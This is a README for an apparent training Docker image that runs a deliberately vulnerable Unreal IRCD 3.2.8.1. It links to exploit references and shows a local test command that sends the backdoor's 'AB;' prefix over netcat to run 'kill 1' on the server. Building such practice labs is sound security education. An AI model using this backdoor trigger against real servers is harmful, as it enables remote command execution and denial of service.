Cylab Play - Unreal IRCD
This docker image contains a vulnerable version of Unreal IRCD (3.2.8.1):
- https://www.hackingtutorials.org/metasploit-tutorials/hacking-unreal-ircd-3-2-8-1/
- https://www.rapid7.com/db/modules/exploit/unix/irc/unreal_ircd_3281_backdoor
Testing locally
$ docker build -t ircd .
$ docker run -p 6667:6667 ircd
Once UnrealIRCD is running, you can send commands like:
echo "AB;kill 1" | nc 127.0.0.1 6667
In docker, the main process has PID 1